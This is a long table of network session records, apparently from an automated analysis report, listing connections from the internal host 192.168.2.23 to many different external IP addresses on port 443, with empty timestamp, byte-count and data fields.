                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15907192.168.2.2349726165.238.76.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15908192.168.2.233992070.144.199.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15909192.168.2.2360050210.79.195.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15910192.168.2.235944081.45.158.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15911192.168.2.2358426102.177.37.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15912192.168.2.2354138134.2.110.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15913192.168.2.234306831.79.179.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15914192.168.2.2343270130.161.103.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15915192.168.2.234663449.108.29.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15916192.168.2.2343246108.182.236.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15917192.168.2.2352168100.205.142.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15918192.168.2.2343458200.109.220.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15919192.168.2.235855257.238.253.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15920192.168.2.23474822.196.3.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15921192.168.2.2335100219.3.81.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15922192.168.2.234460235.95.210.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15923192.168.2.2354504179.177.95.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15924192.168.2.2349094192.112.136.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15925192.168.2.234965258.201.246.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15926192.168.2.2335038191.79.171.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15927192.168.2.2360104153.56.135.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15928192.168.2.2348386145.186.29.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15929192.168.2.2354850172.173.141.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15930192.168.2.233279688.151.3.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15931192.168.2.2344362218.233.121.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15932192.168.2.2345958121.27.210.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15933192.168.2.235217218.11.46.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15934192.168.2.2359678140.154.158.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15935192.168.2.2342370152.146.82.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15936192.168.2.233652023.151.103.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15937192.168.2.2354012223.118.222.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15938192.168.2.2355380145.254.131.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15939192.168.2.2335344193.68.77.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15940192.168.2.235165078.156.233.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15941192.168.2.2351894147.224.107.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15942192.168.2.2355282145.236.238.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15943192.168.2.2341038194.255.54.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15944192.168.2.234241267.199.144.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15945192.168.2.235961427.250.45.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15946192.168.2.233490096.85.106.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15947192.168.2.235742041.41.43.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15948192.168.2.233819431.111.105.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15949192.168.2.2346332189.161.129.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15950192.168.2.2344336204.146.223.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15951192.168.2.233949893.39.164.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15952192.168.2.2355684110.38.246.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15953192.168.2.233572636.106.17.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15954192.168.2.235208262.113.119.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15955192.168.2.233677894.34.233.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15956192.168.2.2336574160.149.170.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15957192.168.2.235122698.83.35.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15958192.168.2.2347108118.251.66.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15959192.168.2.2342554137.12.32.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15960192.168.2.2359314110.16.76.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15961192.168.2.2357474169.49.125.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15962192.168.2.233919252.44.243.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15963192.168.2.2355538100.14.13.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15964192.168.2.2337892114.163.241.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15965192.168.2.2339084139.189.158.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15966192.168.2.234942453.231.17.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15967192.168.2.235832418.158.18.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15968192.168.2.2336060118.158.224.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15969192.168.2.2358950197.175.148.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15970192.168.2.233524835.232.29.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15971192.168.2.234563669.107.249.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15972192.168.2.234925446.92.169.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15973192.168.2.236095637.200.201.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15974192.168.2.2350096219.99.245.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15975192.168.2.2355766171.249.198.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15976192.168.2.2340704149.15.150.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15977192.168.2.234031217.107.62.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15978192.168.2.2343832159.253.35.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15979192.168.2.233436035.108.113.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15980192.168.2.235562671.123.166.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15981192.168.2.233993279.32.20.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15982192.168.2.2337626163.28.170.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15983192.168.2.234010688.143.240.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15984192.168.2.233415474.196.49.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15985192.168.2.233293881.45.17.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15986192.168.2.234824894.237.217.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15987192.168.2.2344552143.212.17.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15988192.168.2.2336588126.154.252.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15989192.168.2.235778013.190.122.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15990192.168.2.23487862.115.200.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15991192.168.2.235942671.192.40.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15992192.168.2.2337482163.170.255.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15993192.168.2.2349888162.120.40.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15994192.168.2.234472073.35.205.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15995192.168.2.233598290.129.151.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15996192.168.2.233491040.223.47.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15997192.168.2.2345906184.224.244.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15998192.168.2.2339768164.100.81.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15999192.168.2.2349598119.110.237.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16000192.168.2.2333264133.196.50.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16001192.168.2.2340014221.188.67.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16002192.168.2.233857638.173.219.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16003192.168.2.234373085.94.120.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16004192.168.2.233548024.154.5.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16005192.168.2.235693674.247.234.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16006192.168.2.2344194123.140.180.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16007192.168.2.234244277.144.157.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16008192.168.2.233747053.230.151.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16009192.168.2.2352274205.73.24.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16010192.168.2.235989078.239.59.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16011192.168.2.2356532190.41.178.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16012192.168.2.2342576131.107.25.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16013192.168.2.233546494.148.79.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16014192.168.2.2339126204.116.39.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16015192.168.2.2334126178.170.163.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16016192.168.2.2340180125.174.123.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16017192.168.2.2348814160.134.246.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16018192.168.2.2337178195.209.33.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16019192.168.2.234773285.157.242.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16020192.168.2.2348548177.210.205.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16021192.168.2.234529090.113.14.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16022192.168.2.235600650.61.237.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16023192.168.2.2341180199.223.34.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16024192.168.2.2356450150.211.123.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16025192.168.2.2334622143.150.80.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16026192.168.2.2350602137.201.117.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16027192.168.2.234189866.29.178.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16028192.168.2.2356838177.23.210.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16029192.168.2.2346712151.153.49.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16030192.168.2.234378850.20.228.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16031192.168.2.2349576167.117.137.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16032192.168.2.2342742139.141.96.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16033192.168.2.235342276.164.74.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16034192.168.2.2346902219.209.80.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16035192.168.2.2338228181.58.213.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16036192.168.2.2350180117.216.30.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16037192.168.2.234706838.44.108.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16038192.168.2.235422834.82.162.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16039192.168.2.2347662147.37.179.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16040192.168.2.2350384115.91.187.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16041192.168.2.2357134161.66.234.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16042192.168.2.2354838176.207.235.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16043192.168.2.2350722148.21.168.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16044192.168.2.235220027.96.211.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16045192.168.2.234541872.72.77.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16046192.168.2.2346034163.159.230.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16047192.168.2.2350020185.209.67.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16048192.168.2.2351712139.220.184.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16049192.168.2.234099497.127.159.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16050192.168.2.23365345.117.68.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16051192.168.2.2344820176.24.19.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16052192.168.2.234497074.210.140.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16053192.168.2.2346964153.18.169.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16054192.168.2.234159884.171.190.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16055192.168.2.234222625.104.97.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16056192.168.2.2351118218.106.216.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16057192.168.2.235497642.156.208.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16058192.168.2.235508623.85.3.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16059192.168.2.2356284175.175.114.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16060192.168.2.2336684119.172.49.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16061192.168.2.234908259.238.15.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16062192.168.2.2333318199.165.235.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16063192.168.2.2356946142.47.250.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16064192.168.2.2347784187.14.129.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16065192.168.2.2339318186.50.142.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16066192.168.2.234931246.2.53.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16067192.168.2.2338302117.101.18.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16068192.168.2.2334810197.153.248.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16069192.168.2.235136813.69.2.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16070192.168.2.235443814.58.21.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16071192.168.2.234610491.254.236.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16072192.168.2.2339058100.32.141.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16073192.168.2.2349710155.16.119.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16074192.168.2.235999468.114.82.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16075192.168.2.2343292134.80.76.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16076192.168.2.2339478168.236.249.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16077192.168.2.2350166187.250.162.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16078192.168.2.2336888166.203.184.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16079192.168.2.2355392163.124.161.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16080192.168.2.234973246.168.151.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16081192.168.2.2339432177.97.29.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16082192.168.2.2333044211.63.132.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16083192.168.2.2349856181.152.179.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16084192.168.2.235101492.174.89.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16085192.168.2.2358590193.26.213.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16086192.168.2.2342028148.96.60.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16087192.168.2.235862698.116.47.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16088192.168.2.236005663.20.179.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16089192.168.2.233564497.4.93.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16090192.168.2.2348328177.77.144.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16091192.168.2.235825425.100.200.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16092192.168.2.2346064123.22.162.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16093192.168.2.2358246176.67.201.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16094192.168.2.2357166192.52.162.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16095192.168.2.2338032162.2.54.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16096192.168.2.2336926150.174.200.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16097192.168.2.2342698192.197.221.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16098192.168.2.2339422152.165.210.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16099192.168.2.234053693.208.173.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16100192.168.2.2353310140.200.95.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16101192.168.2.2354846148.180.56.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16102192.168.2.2359006179.254.137.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16103192.168.2.2341262145.217.121.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16104192.168.2.235740252.44.168.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16105192.168.2.2338228212.147.204.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16106192.168.2.2341678100.17.79.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16107192.168.2.234683044.33.207.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16108192.168.2.2340180177.80.171.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16109192.168.2.234398458.180.38.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16110192.168.2.2339972150.255.216.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16111192.168.2.2348470106.64.162.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16112192.168.2.2357620167.251.139.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16113192.168.2.2346400195.34.187.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16114192.168.2.235516688.124.88.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16115192.168.2.2354692186.106.248.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16116192.168.2.233889027.227.78.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16117192.168.2.235881280.183.244.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16118192.168.2.2336620154.47.155.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16119192.168.2.2359074141.105.249.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16120192.168.2.2350588217.191.210.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16121192.168.2.2347722119.61.221.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16122192.168.2.233739681.159.74.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16123192.168.2.2343904134.4.53.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16124192.168.2.2338564147.240.135.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16125192.168.2.23575122.115.214.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16126192.168.2.233893647.138.16.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16127192.168.2.236043639.246.56.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16128192.168.2.2335840150.148.103.26443
